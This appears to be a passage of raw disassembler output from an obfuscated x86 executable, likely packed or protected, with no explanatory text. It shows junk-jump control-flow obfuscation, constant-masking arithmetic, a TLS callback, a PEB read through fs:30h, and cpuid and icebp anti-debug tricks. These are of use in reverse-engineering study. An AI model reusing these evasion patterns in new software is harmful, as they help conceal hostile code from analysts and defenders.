call sub_423B43
; START OF FUNCTION CHUNK FOR sub_42EAB7
loc_42DFB6: ; CODE XREF: sub_42EAB7-59BF�j
jmp nullsub_187
; END OF FUNCTION CHUNK FOR sub_42EAB7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42DFBB proc near ; CODE XREF: TlsCallback_0�p
var_6 = byte ptr -6
xchg ebp, [esp+0]
mov ebp, [esp+0]
mov ebp, esp
call sub_429D83
or ebp, 8E99DFC7h
jmp sub_429D1C
sub_42DFBB endp
; ---------------------------------------------------------------------------
mov [ebp-4], eax
push offset sub_4270B3
jmp loc_42D5AE
; ---------------------------------------------------------------------------
sub esi, ebp
jmp sub_4268FC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EA15
loc_42DFE7: ; CODE XREF: sub_42EA15:loc_427148�j
xor eax, 69BEB5C2h
add eax, 0A5E62EE7h
xchg eax, [esp+0Ch+var_C]
jmp sub_425879
; END OF FUNCTION CHUNK FOR sub_42EA15
; =============== S U B R O U T I N E =======================================
sub_42DFFB proc near ; DATA XREF: _0182ofla:0042E875�o
mov ds:dword_424C1C, eax
xor eax, eax
mov [ebp-4], eax
loc_42E005: ; CODE XREF: sub_427DFA:loc_426621�j
; sub_423B43:loc_42D2FE�j
push offset loc_42DF9C
jmp nullsub_205
sub_42DFFB endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E6BF
loc_42E00F: ; CODE XREF: sub_42E6BF+2E1�j
jnz loc_42DA8C
jmp loc_42D374
; END OF FUNCTION CHUNK FOR sub_42E6BF
; ---------------------------------------------------------------------------
loc_42E01A: ; CODE XREF: _0182ofla:00428BA8�j
rol ebx, 14h
; =============== S U B R O U T I N E =======================================
sub_42E01D proc near ; CODE XREF: sub_42A915:loc_42CC1F�p
mov [esp+0], eax
pop eax
call sub_42AB27
retn
sub_42E01D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_42E027: ; CODE XREF: _0182ofla:0042992B�j
jmp loc_42848C
; ---------------------------------------------------------------------------
loc_42E02C: ; CODE XREF: _0182ofla:loc_4277B2�j
call sub_423FCD
test al, al
jmp loc_425DBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_42E038: ; CODE XREF: sub_42D056:loc_426678�j
; DATA XREF: sub_425499-1711�o
call sub_425E4D
test eax, eax
jnz loc_428908
jmp loc_424042
; END OF FUNCTION CHUNK FOR sub_42D056
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423861
loc_42E04A: ; CODE XREF: sub_423861+3B09�j
xor eax, eax
loc_42E04C: ; CODE XREF: sub_423861+6A8E�j
mov [ebp+var_5], al
mov al, [ebp+var_5]
pop ecx
jmp loc_429870
; END OF FUNCTION CHUNK FOR sub_423861
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A420
loc_42E058: ; CODE XREF: sub_42A420-6218�j
jz loc_42C49A
jmp loc_42C865
; END OF FUNCTION CHUNK FOR sub_42A420
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42E063: ; CODE XREF: sub_42326C+8497�j
call sub_428729
sbb edi, ebp
jmp sub_4277FA
; END OF FUNCTION CHUNK FOR sub_42326C
; ---------------------------------------------------------------------------
locret_42E06F: ; CODE XREF: _0182ofla:loc_424C08�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425BED
loc_42E070: ; CODE XREF: sub_425BED+1C5B�j
jmp sub_42CC99
; END OF FUNCTION CHUNK FOR sub_425BED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42E075: ; CODE XREF: sub_4253F4+1847�j
jmp loc_42B2D9
; END OF FUNCTION CHUNK FOR sub_4253F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B01
loc_42E07A: ; CODE XREF: sub_426B01-FAB�j
jmp sub_427259
; END OF FUNCTION CHUNK FOR sub_426B01
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42E07F: ; CODE XREF: sub_423A2A-47B�j
jmp loc_4247C6
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4267F8
loc_42E084: ; CODE XREF: sub_4267F8:loc_423CF5�j
mov eax, [ebp-4]
cmp byte ptr [eax], 0
jnz loc_42DCC6
mov eax, [ebp-8]
mov byte ptr [eax], 0
mov esp, ebp
pop ebp
jmp nullsub_162
; END OF FUNCTION CHUNK FOR sub_4267F8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423FE2
loc_42E09E: ; CODE XREF: sub_423FE2:loc_42358D�j
add edx, 0FC6F7EE2h
mov edx, [edx]
xchg edx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_423FE2
; ---------------------------------------------------------------------------
loc_42E0AA: ; CODE XREF: _0182ofla:00425022�j
add ecx, 4
mov [ecx], eax
add ecx, 4
mov [ecx], eax
add ecx, 4
jmp loc_42C95F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_42E0C5: ; CODE XREF: sub_42B1F9-2D7E�j
jnz loc_42543A
jmp loc_42B3D2
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
db 0C3h ; Ã
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD2A
loc_42E0D1: ; CODE XREF: sub_42DD2A+C�j
jmp loc_425D0E
; END OF FUNCTION CHUNK FOR sub_42DD2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_42E0D6: ; CODE XREF: sub_42DE3A:loc_428E1E�j
jnp loc_423398
jmp loc_42E34B
; END OF FUNCTION CHUNK FOR sub_42DE3A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42E0E1: ; CODE XREF: sub_42B669:loc_423ADA�j
jnz loc_425520
jmp loc_42E371
; END OF FUNCTION CHUNK FOR sub_42B669
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290FD
loc_42E0EC: ; CODE XREF: sub_4290FD:loc_4236C0�j
mov ebx, ebp
pop ebp
and ebx, 6B951FF5h
rol ebx, 0Dh
push offset sub_42C77B
jmp nullsub_163
; END OF FUNCTION CHUNK FOR sub_4290FD
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_42E102 proc near ; CODE XREF: sub_429A64:loc_42B3BD�j
retn
sub_42E102 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428C7D
loc_42E103: ; CODE XREF: sub_428C7D-1407�j
jmp loc_428BDA
; END OF FUNCTION CHUNK FOR sub_428C7D
; ---------------------------------------------------------------------------
call sub_42C979
; START OF FUNCTION CHUNK FOR sub_429C1A
loc_42E10D: ; CODE XREF: sub_429C1A:loc_424C7F�j
lea eax, [ebp-20h]
push eax
call sub_423395
loc_42E116: ; CODE XREF: _0182ofla:00429749�j
jmp nullsub_164
; END OF FUNCTION CHUNK FOR sub_429C1A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_42E11B: ; CODE XREF: sub_428A39-52B8�j
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_42D629
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_42E126: ; CODE XREF: sub_4253F4+37DB�j
mov eax, 1
xor edx, edx
cpuid
and eax, 0FFFh
add [esi], eax
jmp loc_423696
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
sub_42E13B proc near ; DATA XREF: _0182ofla:00424571�o
; FUNCTION CHUNK AT 004285DF SIZE 00000005 BYTES
ror eax, 12h
mov ds:dword_424BF8, eax
jmp loc_4285DF
sub_42E13B endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CA29
loc_42E149: ; CODE XREF: sub_42CA29�j
push offset sub_426A7F
jmp loc_425413
; END OF FUNCTION CHUNK FOR sub_42CA29
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428AC9
loc_42E153: ; CODE XREF: sub_428AC9+4461�j
; sub_428AC9:loc_42EB23�j
push 6C341CC4h
xor [esp+8+var_8], 6C341CC4h
push eax
pushf
push 34DE2267h
pop eax
and eax, 344D7AA6h
xor eax, 344C2226h
jmp loc_4264B3
; END OF FUNCTION CHUNK FOR sub_428AC9
; =============== S U B R O U T I N E =======================================
sub_42E178 proc near ; DATA XREF: sub_42798F:loc_4240EF�o
; FUNCTION CHUNK AT 00427834 SIZE 00000007 BYTES
pushf
call sub_423AF2
loc_42E17E: ; CODE XREF: sub_425BED+8E6F�j
jmp loc_427834
sub_42E178 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_61. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42E184: ; CODE XREF: sub_428D63+4E09�j
jmp loc_42D447
; ---------------------------------------------------------------------------
loc_42E189: ; CODE XREF: sub_428D63+23C4�j
jmp loc_4299FF
; END OF FUNCTION CHUNK FOR sub_428D63
; =============== S U B R O U T I N E =======================================
sub_42E18E proc near ; CODE XREF: start�j
; FUNCTION CHUNK AT 00423D1E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426B49 SIZE 0000000A BYTES
call nullsub_2
push eax
push 277EDF67h
pop eax
xor eax, 86027DA4h
or eax, 95BF21D7h
jmp loc_423D1E
sub_42E18E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D19B
loc_42E1AB: ; CODE XREF: sub_42D19B-244A�j
mov ebp, [eax]
add eax, 4
push offset sub_42445E
jmp nullsub_166
; END OF FUNCTION CHUNK FOR sub_42D19B
; ---------------------------------------------------------------------------
loc_42E1BA: ; CODE XREF: _0182ofla:0042D971�j
mov edx, [eax]
loc_42E1BC: ; CODE XREF: _0182ofla:loc_424249�j
mov eax, large fs:30h
call sub_428599
; =============== S U B R O U T I N E =======================================
sub_42E1C8 proc near ; CODE XREF: sub_42719D+BE7�p
; _0182ofla:0042CFC2�j
; FUNCTION CHUNK AT 004257A8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042621B SIZE 0000000E BYTES
mov [esp+0], ebx
pop ebx
push 92A6EA59h
pop esi
rol esi, 18h
jmp loc_4257A8
sub_42E1C8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E1DA proc near ; CODE XREF: sub_4273AD+12�p
; _0182ofla:0042742A�j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 0042822F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428DB2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429BE2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B2F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042DF17 SIZE 0000000C BYTES
mov [esp+0], eax
pop eax
push ecx
push 3599CFA3h
pop ecx
add ecx, 0D195A290h
jmp loc_429BE2
sub_42E1DA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E1F0 proc near ; CODE XREF: _0182ofla:00423FB7�j
; _0182ofla:00425462�p
; FUNCTION CHUNK AT 00423565 SIZE 0000000A BYTES
mov [esp+0], ebx
pop ebx
pushf
mov [esp+0], eax
jmp loc_423565
sub_42E1F0 endp
; ---------------------------------------------------------------------------
loc_42E1FD: ; CODE XREF: _0182ofla:00427220�j
or esi, eax
; START OF FUNCTION CHUNK FOR sub_4242FD
loc_42E1FF: ; CODE XREF: sub_4242FD:loc_42720A�j
add edi, 0AEF1E910h
push offset sub_42C95B
jmp nullsub_238
; END OF FUNCTION CHUNK FOR sub_4242FD
; ---------------------------------------------------------------------------
popf
ror esi, 7
jmp sub_42E403
; =============== S U B R O U T I N E =======================================
sub_42E218 proc near ; CODE XREF: sub_424BCB-CB1�p
; sub_425063:loc_428FA7�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423691 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004242E2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424B9C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424DA2 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042568D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425C32 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00425CE7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427F19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004280E1 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00428C17 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A897 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C841 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042CC9F SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042DBE9 SIZE 00000007 BYTES
jz loc_425C32
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42D425
sub_42E218 endp
; ---------------------------------------------------------------------------
pop ecx
jmp sub_4233EC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C379
loc_42E22F: ; CODE XREF: sub_42C379:loc_429DE8�j
mov eax, [ebp-10h]
mov eax, [eax+60h]
; END OF FUNCTION CHUNK FOR sub_42C379
; START OF FUNCTION CHUNK FOR sub_42448C
loc_42E235: ; CODE XREF: sub_42448C+5096�j
add eax, [ebp+var_4]
mov [ebp+var_14], eax
mov eax, [ebp+var_14]
push offset sub_428781
jmp nullsub_167
; END OF FUNCTION CHUNK FOR sub_42448C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429242
loc_42E248: ; CODE XREF: sub_429242:loc_42924E�j
db 36h
icebp
jmp loc_42B159
; END OF FUNCTION CHUNK FOR sub_429242
; ---------------------------------------------------------------------------
mov esi, 0E9774B90h
jmp loc_423D9C
; ---------------------------------------------------------------------------
sub edx, ebp
adc edx, ebx
jmp sub_429DCF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42561D
loc_42E262: ; CODE XREF: sub_42561D:loc_42B592�j
xor [ebp-8], eax
inc dword ptr [ebp-0Ch]
jmp loc_42766D
; END OF FUNCTION CHUNK FOR sub_42561D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C2F0
loc_42E26D: ; CODE XREF: sub_4289E4+38A5�j
; sub_42C2F0+4�j
inc dword ptr [ebp-8]
inc dword ptr [ebp-0Ch]
jmp loc_4297E8
; END OF FUNCTION CHUNK FOR sub_42C2F0
; =============== S U B R O U T I N E =======================================
sub_42E278 proc near ; CODE XREF: _0182ofla:00426B44�j
; sub_42798F:loc_42C36D�p
mov [esp+0], ecx
pop ecx
call sub_42E282
retn
sub_42E278 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42E282 proc near ; CODE XREF: sub_42D02D-5731�p
; sub_42E278+4�p
; FUNCTION CHUNK AT 00427786 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428028 SIZE 00000019 BYTES
jno loc_428028
mov eax, (offset loc_42D1F3+1)
call sub_429AA3
test al, al
jmp loc_427563
sub_42E282 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4243D3
loc_42E299: ; CODE XREF: sub_4243D3:loc_42C1DB�j
jg loc_426C28
jmp loc_42B2B4
; END OF FUNCTION CHUNK FOR sub_4243D3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DF41
loc_42E2A4: ; CODE XREF: sub_42DF41-5587�j
jmp loc_425A2D
; END OF FUNCTION CHUNK FOR sub_42DF41
; ---------------------------------------------------------------------------
loc_42E2A9: ; CODE XREF: _0182ofla:loc_42C1B9�j
push offset sub_4283EF
jmp locret_429916
; =============== S U B R O U T I N E =======================================
sub_42E2B3 proc near ; CODE XREF: sub_42B15E:loc_42353F�p
; _0182ofla:004266BC�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0042A6D0 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
add eax, 0BE97EA69h
xchg eax, [esp-4+arg_0]
jmp loc_42A6D0
sub_42E2B3 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427906
loc_42E2C5: ; CODE XREF: sub_427906:loc_42DB61�j
div dword ptr [ebp-8]
push ebx
push 0DBACB0FEh
pop ebx
add ebx, 76A4EFE2h
add ebx, ebp
add ebx, 0ADAE5F14h
jmp loc_423CB3
; END OF FUNCTION CHUNK FOR sub_427906
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_68. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C565
loc_42E2E3: ; CODE XREF: sub_42C565+15�j
jmp loc_425E1D
; END OF FUNCTION CHUNK FOR sub_42C565
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42E2E9: ; CODE XREF: sub_423A2A+5458�j
jmp loc_428403
; END OF FUNCTION CHUNK FOR sub_423A2A
; =============== S U B R O U T I N E =======================================
sub_42E2EE proc near ; CODE XREF: sub_425DA5+588B�j
; _0182ofla:0042DEEF�p
; FUNCTION CHUNK AT 00429F66 SIZE 00000006 BYTES
call sub_42A181
call sub_429BEC
sbb edx, eax
jmp loc_429F66
sub_42E2EE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ECFA
loc_42E2FF: ; CODE XREF: sub_42ECFA:loc_42ECFF�j
call sub_426455
; END OF FUNCTION CHUNK FOR sub_42ECFA
; START OF FUNCTION CHUNK FOR sub_428F20
loc_42E304: ; CODE XREF: sub_428F20:loc_428CE0�j
mov edx, 0E5254649h
loc_42E309: ; CODE XREF: _0182ofla:loc_42402A�j
call sub_42B097
loc_42E30E: ; CODE XREF: _0182ofla:loc_42B54D�j
mov ds:dword_427A24, eax
jmp loc_424F21
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
or ecx, ebp
jmp loc_42B4FE
; ---------------------------------------------------------------------------
locret_42E31F: ; CODE XREF: _0182ofla:loc_42597B�j
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E320 proc near ; CODE XREF: sub_42A0B2:loc_42AD56�p
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42B480
sub_42E320 endp
; ---------------------------------------------------------------------------
loc_42E32B: ; CODE XREF: _0182ofla:00426FD7�j
jnz loc_429229
jmp loc_4263DF
; ---------------------------------------------------------------------------
popf
jmp sub_42CC59
; ---------------------------------------------------------------------------
loc_42E33C: ; DATA XREF: sub_42C5EF-4451�o
mov [esp], edx
push ecx
push ebx
push offset sub_4273AD
jmp locret_42CA82
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DE3A
loc_42E34B: ; CODE XREF: sub_42DE3A+2A2�j
pop esi
loc_42E34C: ; CODE XREF: sub_42DE3A:loc_424C41�j
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push offset loc_426A26
jmp loc_42C6C2
; END OF FUNCTION CHUNK FOR sub_42DE3A
; =============== S U B R O U T I N E =======================================
sub_42E35C proc near ; CODE XREF: _0182ofla:0042880A�p
; _0182ofla:00429903�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00423B66 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042DF84 SIZE 00000018 BYTES
mov [esp+0], eax
pop eax
mov eax, [eax]
push eax
jmp loc_42DF84
sub_42E35C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_42E368: ; CODE XREF: sub_4298DD-5A4F�j
; _0182ofla:loc_42E868�j
xchg eax, [esp+0]
jmp sub_4295D6
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B669
loc_42E371: ; CODE XREF: sub_42B669+2A7E�j
jmp loc_42D8B9
; END OF FUNCTION CHUNK FOR sub_42B669
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42E376 proc near ; CODE XREF: sub_42D70E+DA9�j
; FUNCTION CHUNK AT 00427CC2 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0042EA42 SIZE 00000005 BYTES
push ebp
mov ebp, esp
xchg ecx, edi
push edi
xchg ecx, edi
mov esp, ebp
jmp loc_42EA42
sub_42E376 endp
; ---------------------------------------------------------------------------
loc_42E385: ; CODE XREF: _0182ofla:loc_428814�j
add ebx, 0E3CBFAC5h
push offset sub_425549
jmp loc_42E4BD
; =============== S U B R O U T I N E =======================================
sub_42E395 proc near ; CODE XREF: sub_42E825:loc_426E15�p
; _0182ofla:0042793C�j
; FUNCTION CHUNK AT 00425881 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004274DE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429B47 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00429C0D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042B384 SIZE 00000005 BYTES
mov [esp+0], edi
pop edi
call sub_42C197
push esi
push 639D8C89h
loc_42E3A4: ; CODE XREF: _0182ofla:loc_42EAEA�j
pop esi
add esi, 0EF0E3969h
xor esi, 1062D7ACh
jmp loc_42B384
sub_42E395 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CB00
loc_42E3B6: ; CODE XREF: sub_42CB00-1F96�j
push 9773DBE8h
or ebx, 0A64E38C4h
push 0F8E19F66h
jmp loc_42EB91
; END OF FUNCTION CHUNK FOR sub_42CB00
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424184
loc_42E3CB: ; CODE XREF: sub_424184+B79�j
sbb ebx, esi
sub ebx, 99E44E45h
mov ecx, [esi]
jg loc_426286
loc_42E3DB: ; CODE XREF: sub_424184:loc_42691F�j
xor eax, eax
call sub_428245
; END OF FUNCTION CHUNK FOR sub_424184
; START OF FUNCTION CHUNK FOR sub_42B5CC
loc_42E3E2: ; CODE XREF: sub_42B5CC:loc_42A08D�j
add ecx, 0BE46CDFCh
mov ecx, [ecx]
xchg ecx, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42B5CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C89
loc_42E3EE: ; CODE XREF: sub_425C89:loc_42CEF0�j
xchg ecx, ebx
mov esp, ebp
xchg ecx, [esp+0]
mov ebp, ecx
sbb ecx, 4341EB4Fh
jmp loc_427159
; END OF FUNCTION CHUNK FOR sub_425C89
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_156. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_42E403 proc near ; CODE XREF: sub_427ED1:loc_4262F7�p
; _0182ofla:0042E213�j
mov [esp+0], eax
pop eax
xor eax, esi
sub_42E403 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_424762
loc_42E409: ; CODE XREF: sub_424762+6�j
add eax, edi
add al, ah
call sub_42C553
locret_42E412: ; CODE XREF: sub_425A3C:loc_429781�j
retn
; END OF FUNCTION CHUNK FOR sub_424762
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_42E413: ; CODE XREF: sub_42966F:loc_428FE8�j
push eax
loc_42E414: ; CODE XREF: sub_425C89:loc_423C36�j
call sub_42B500
loc_42E419: ; CODE XREF: sub_425DA5+7C9E�j
jmp loc_42363A
; END OF FUNCTION CHUNK FOR sub_42966F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42326C
loc_42E41E: ; CODE XREF: sub_42326C:loc_426BB6�j
push edi
push 0D2E12435h
pop edi
add edi, 0D807356Dh
or edi, 2161BCECh
cmp edi, 0EE117E9Eh
jmp loc_42D28B
; END OF FUNCTION CHUNK FOR sub_42326C
; =============== S U B R O U T I N E =======================================
sub_42E43C proc near ; CODE XREF: sub_42D553:loc_425059�p
; _0182ofla:0042971D�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00426C5A SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042773B SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
xchg ebx, [esp-4+arg_0]
mov ebp, ebx
pop ebx
call sub_42D33D
loc_42E44B: ; CODE XREF: sub_423FE2:loc_425F9D�j
cmp ebp, edx
jmp loc_426C5A
sub_42E43C endp ; sp-analysis failed
; ---------------------------------------------------------------------------
test ecx, eax
jmp loc_429AAB
; ---------------------------------------------------------------------------
push 42244363h
jmp sub_42A041
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429C68
loc_42E463: ; CODE XREF: sub_429C68:loc_427EF4�j
jz loc_42B7CE
jmp loc_42EDC4
; END OF FUNCTION CHUNK FOR sub_429C68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231F3
loc_42E46E: ; CODE XREF: sub_4231F3:loc_426DDC�j
push offset sub_42395F
jmp nullsub_199
; END OF FUNCTION CHUNK FOR sub_4231F3
; ---------------------------------------------------------------------------
loc_42E478: ; CODE XREF: _0182ofla:00429D5C�j
push edi
push 0F65F2C29h
pop edi
add edi, 9E3BCB7h
mov [edi], eax
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426EA9
loc_42E489: ; CODE XREF: sub_426EA9+7�j
jmp nullsub_169
; END OF FUNCTION CHUNK FOR sub_426EA9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_42E48E: ; CODE XREF: sub_423A2A:loc_42323F�j
mov eax, [ebp-8]
shr eax, 0Bh
; END OF FUNCTION CHUNK FOR sub_423A2A
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_42E494: ; CODE XREF: sub_425EA5+6ED9�j
xor [ebp-8], eax
mov eax, [ebp-8]
shl eax, 0Fh
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_42AAAA
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D70E
loc_42E4A8: ; CODE XREF: sub_42D70E-72FE�j
and eax, 8C34950Bh
add eax, 802E5367h
xchg eax, [esp+8+var_8]
jmp sub_42E376
; END OF FUNCTION CHUNK FOR sub_42D70E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_190. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_42E4BD: ; CODE XREF: _0182ofla:0042E390�j
jmp locret_4275F0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_42E4C2: ; CODE XREF: sub_428F46-2D91�j
jmp loc_425A56
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4286A8
loc_42E4C7: ; CODE XREF: sub_4286A8-3214�j
jmp nullsub_170
; END OF FUNCTION CHUNK FOR sub_4286A8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425629
loc_42E4CC: ; CODE XREF: sub_425629-1745�j
jmp loc_425644
; END OF FUNCTION CHUNK FOR sub_425629
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A5FC
loc_42E4D1: ; CODE XREF: sub_42A5FC:loc_429917�j
xor edx, edx
call sub_42B14D
call sub_4247FE
call nullsub_3
; END OF FUNCTION CHUNK FOR sub_42A5FC
; START OF FUNCTION CHUNK FOR sub_42798F
loc_42E4E2: ; CODE XREF: sub_42798F+1DCB�j
; sub_42D76D+14�j
mov eax, ds:dword_42A3B4
mov [ebp-4], eax
mov eax, offset dword_42A3A8
jmp loc_42D35C
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
mov esi, [eax]
jmp sub_42DA2D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E6A
loc_42E4FB: ; CODE XREF: sub_426E6A+44DC�j
xchg edi, [esp+0]
push ecx
push 0F433994Bh
pop ecx
sub ecx, 804EE581h
xor ecx, 1323C320h
jmp loc_42A409
; END OF FUNCTION CHUNK FOR sub_426E6A
; ---------------------------------------------------------------------------
dw 0C085h
dd 0D130840Fh, 858DFFFFh, 0FFFFF800h, 51046A50h, 0EF552868h
dd 0BEE959D9h
db 0B0h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B3C2
loc_42E533: ; CODE XREF: sub_42B3C2-4A71�j
xchg edi, ebp
loc_42E535: ; CODE XREF: _0182ofla:loc_42828F�j
mov eax, [ebp-4]
call sub_42C1A3
; END OF FUNCTION CHUNK FOR sub_42B3C2
; START OF FUNCTION CHUNK FOR sub_426993
loc_42E53D: ; CODE XREF: sub_426993-CD4�j
add eax, ecx
loc_42E53F: ; CODE XREF: sub_426993:loc_42A650�j
call sub_42AA62
adc ecx, 219431F6h
jmp sub_428F0F
; END OF FUNCTION CHUNK FOR sub_426993
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B1F9
loc_42E54F: ; CODE XREF: sub_42B1F9+8F�j
xchg eax, [esp+0]
jmp loc_424048
; END OF FUNCTION CHUNK FOR sub_42B1F9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
